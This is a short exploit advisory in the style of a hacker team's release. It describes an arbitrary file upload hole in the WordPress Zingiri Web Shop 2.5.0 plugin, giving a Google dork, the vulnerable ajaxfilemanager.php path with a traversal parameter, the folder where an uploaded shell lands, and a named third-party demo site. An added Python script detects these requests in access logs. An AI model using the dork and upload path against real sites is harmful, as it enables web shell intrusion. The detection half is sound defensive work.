((|))((|))                      ((|))    |)|    (|)|           |)
     ((|))             ***********************                   
     ((|))              *********************                    
  *  ((|))             *                     *                   
 *0* ((|))            *   In the name of GOD  *                  
  *  ((|))             *                     *                   
 -|- ((|))               *******************                     
  |  ((|))                    *********                          
((|))((|))((|))################((|))########################((|))
# Exploit Title: WordPress Zingiri-web-shop 2.5.0 Plugin    ((|))
# Arbitrary File Upload Vulnerability                       ((|))
# Version: 2.5.0                                                #
# Software Link: www.zingiri.com/plugins-and-addons/web-shop/   #
# Google Dork: inurl:"/wp-content/plugins/zingiri-web-shop/"    #
# Exploit Author: Ashiyane Digital Security Team                #
# Category: Web Application                                     #
# Tested on: Windows 7                                          #
###############################((|))#############################
#******************************((|))****************************#
#* Location:  http://site.com/wp-content/                       #
#* /plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/       #
#* tiny_mce/plugins/ajaxfilemanager/                            #
#* ajaxfilemanager.php?path=[path]                              #
#* Files Upload To: http://site.com/wp-content/plugins/         #
#* fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/#
#* uploaded/file/[Yourshell.X]                                  #
#* Demo: http://vishandelpietkorf.nl/vishandelpietkorf/         #
#* wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/      #
#* jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#
#* ?path=/home/vhosting/a/vhost0015706/domains/                 #
#* vishandelpietkorf.nl/htdocs/www/vishandelpietkorf/wp-content #
#* /plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/       #
#* tiny_mce/plugins/ajaxfilemanager/inc/                        #
#* ../../../../../../../../../../uploads/                       #
#* zingiri-web-shop/pekelhc/                                    #
#******************************((|))****************************#
#******************************((|))****************************#
#******************************((|))****************************#
#*                       *****************                      #
#*                       *               *                      #
#* Greetz to:            * My lord ALLAH *                      #
#*                       *               *                      #
#*                       *****************                      #
#*                          **((|))**                           #
#* Sp Tnx To: Muslims From All Over The World                   #
#* Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,ERroR    #
#* 0x21HATE,A.S.P.I.R.I.N,am118,Angel--D3m0n,angola,AR455,Azad™ #
#* Black-Hole,Classic,Encoder,HASSAN20,HidDeEn,hossein19123     #
#* jooooondost,Kaz3m,ll_Invisible_ll,majidflash,megacpu         #
#* MehrdadLinux,Milad-Bushehr,MostafaBestMan,MR.SAMAN,Mute,N4H  #
#* Pr0grammer,PrinceofHacking,Rizux,Rz04,S!YOU.T4r.6T,Sil3nt Di3#
#* The Smith,unique2world,Unline,V!T0N,X-HIDDEN-X      ((|))    #
#* Crypt0,khatarnak,Milad22,MR.Vinci,Pirjo,V1R4N64R *  ((|))  * #
#* And All Of My Friends                           -|- ((|)) -|-#
#* The Last One : My Self, B4b4K KH4TaR            /|\ ((|)) /|\#
((|))*********************************************((|))((|))((|))
((|))#############################################((|))((|))((|))
((|))                         ((|))               ((|))((|))((|))
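
Added detection example (not part of the original advisory and not the plugin's code): a Python check over web access logs that flags the two request patterns the advisory names, ajaxfilemanager.php called with a path parameter and script-type files served from the ajaxfilemanager uploaded/ directory. The log lines, IP addresses, rule names and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

FM_SCRIPT = "/ajaxfilemanager/ajaxfilemanager.php"  # endpoint named in the advisory
UPLOAD_DIR = "/ajaxfilemanager/uploaded/"           # upload target named in the advisory
# Assumed list of server-executable extensions; also catches doubles like x.php.jpg
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|pl|cgi|asp|aspx|jsp)(\.|$)", re.I)
REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return the set of (hypothetical) rule names one access-log line triggers."""
    m = REQ.search(line)
    if not m:
        return set()
    url = urlsplit(m["target"])
    path = unquote(url.path)
    hits = set()
    if path.endswith(FM_SCRIPT):
        for value in parse_qs(url.query).get("path", []):
            hits.add("filemanager_path_param")
            # Absolute or parent-relative values point outside the default folder
            if value.startswith("/") or ".." in value:
                hits.add("path_escapes_default")
    if UPLOAD_DIR in path and EXEC_EXT.search(path.rsplit("/", 1)[-1]):
        hits.add("script_in_upload_dir")
    return hits

def scan(log_text):
    """Return [(line_number, sorted rule names)] for lines that trigger a rule."""
    out = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            out.append((n, sorted(hits)))
    return out

# Constructed sample log (combined log format, documentation IP ranges)
BASE = ("/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts"
        "/tiny_mce/plugins/ajaxfilemanager")
SAMPLE_LOG = "\n".join([
    f'203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE}/ajaxfilemanager.php?path=../../../uploads/ HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}/uploaded/file/a.php.jpg HTTP/1.1" 200 12',
    f'198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET {BASE}/uploaded/file/catalog.png HTTP/1.1" 200 8811',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?path=/tmp HTTP/1.1" 200 300',
])

if __name__ == "__main__":
    for lineno, rules in scan(SAMPLE_LOG):
        print(lineno, ", ".join(rules))
```

A hit on script_in_upload_dir with a 200 status is the one to triage first, since it means a script-type file in the upload folder was actually served.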